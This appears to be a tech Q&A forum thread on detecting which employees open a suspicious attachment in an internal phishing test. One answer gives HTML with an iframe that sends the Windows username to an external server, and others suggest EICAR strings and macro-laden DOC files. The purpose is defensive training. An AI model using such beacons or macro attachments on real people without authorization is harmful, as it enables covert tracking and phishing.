need to know when email recipient opened email attachment

maharlika
maharlika used Ask the Experts™
on
I want to test our employees to see if they will click on a suspicious email attachment.  I will send it to them from a "throwaway" gmail account, with a pdf attachment and some kind of explanation that they need to open it to read instructions on delivering a package or something to that effect.  I want to know who actually opens it so that I can do more training for them on security awareness. We use Office/outlook 365 for email. How can I tell whether or not a recipient opened the attachment?
Comment
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
I like your question; I might try this myself.

Here is how I would do it. You are not going to get a reply from the email program. It is easy to ignore read receipts. So you need the attachment to actually do something.

I created an html webpage with the following code inside it:

<html>
<title>Important Information</title>
<body>
<iframe src="http://xxx.xxx.xxx.xxx/%username%.jpg" name="iframe_a"></iframe>
</body>
</html>

I saved this as important.htm and attached it to the email. My webserver is running IIS and is located at IP xxx.xxx.xxx.xxx (so you will need to change this part of course).

When the user gets the email and clicks on the attachment it opens their browser to view the attached webpage file. In the webpage file it points to an external server (my IIS server) and tries to get an image that does not exist with the name of their currently logged in username. For example when I clicked it I try to get the "Matthew.jpg" file since that is my current Windows account username.

Then I go to my IIS server and view the activity logs. On my IIS I found them under: C:\inetpub\logs\LogFiles\W3SVC1\u_ex160129.log (This directory and file name will vary. Look for the newest modified file.)

Inside the file I see the following entry:
2016-01-29 04:17:08 192.168.3.250 GET /Matthew.jpg - 80 - 64.134.187.49 Mozilla/5.0+(compatible;+MSIE+10.0;+Windows+NT+6.2;+WOW64;+Trident/6.0) 404 0 2 202

Now I know that user "Matthew" tried to open the attachment.
Most Valuable Expert 2015
Distinguished Expert 2018
Commented:
There's the Safe links functionality in O365 that does just that, but that's only available as part of the premium ATP offerring: https://technet.microsoft.com/en-us/library/mt148491(v=exchg.150).aspx

What it does is very similar to the above, with the benefit of utilizing up-to-date scans of the URLs in question, some basic reporting, etc. But it comes with a price tag :)
The answer from Flashnolan314 effectively describes a basic web beacon. There are various ways they might be used in your scenario, though it's not obvious (to me) how it might be used directly in a .PDF document.

Maybe reading about them in the above link will spark an idea.
My first thought was that perhaps the EICAR Standard Anti-Virus Test File, or more correctly the "string", could be inserted into an attachment to trigger the Anti-Virus software and thereby trigger an alert for you to log.
http://www.eicar.org/86-0-Intended-use.html
http://www.eicar.org/85-0-Download.html

Whether or not this would be blocked by GMail on its way out, or on its way in to Office 365, is something that you would have to test out.  The very presence of certain types of file containing the EICAR string on a computer can trigger the real-time protection functionality of AntiVirus applications.  A Zip file containing a text file with the EICAR test string usually triggers the antivirus application without even being opened.

Manipulating a PDF file to do something takes you into the realms of malware creation.  Malformed PDF files have been used for a long time to spread viruses, but any responsible systems administrator will have already disabled the more enhanced functionality of Adobe Acrobat Reader where this type of attack is prevented:
http://myonlinesecurity.co.uk/infected-malformed-pdf-attachments-emails/
https://nakedsecurity.sophos.com/2012/04/05/ccittfax-pdf-malware/

My other thought was an attached Microsoft Office document containing a macro that does something (quietly or loudly) to log the fact that it was opened.  The older type of MS Office documents (DOC and XLS) can contain macros without having to have a different extension (DOCM instead of DOCX, XLSM instead of XLSX) which can give the game away.  Any sensible systems administrator will have configured MS Office to either prevent macros from running or force a prompt to allow or disallow.  Conversely, most "normal" computer users in corporate environments are click-happy and would allow macros without thinking.  Perhaps you could use this to your advantage.

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial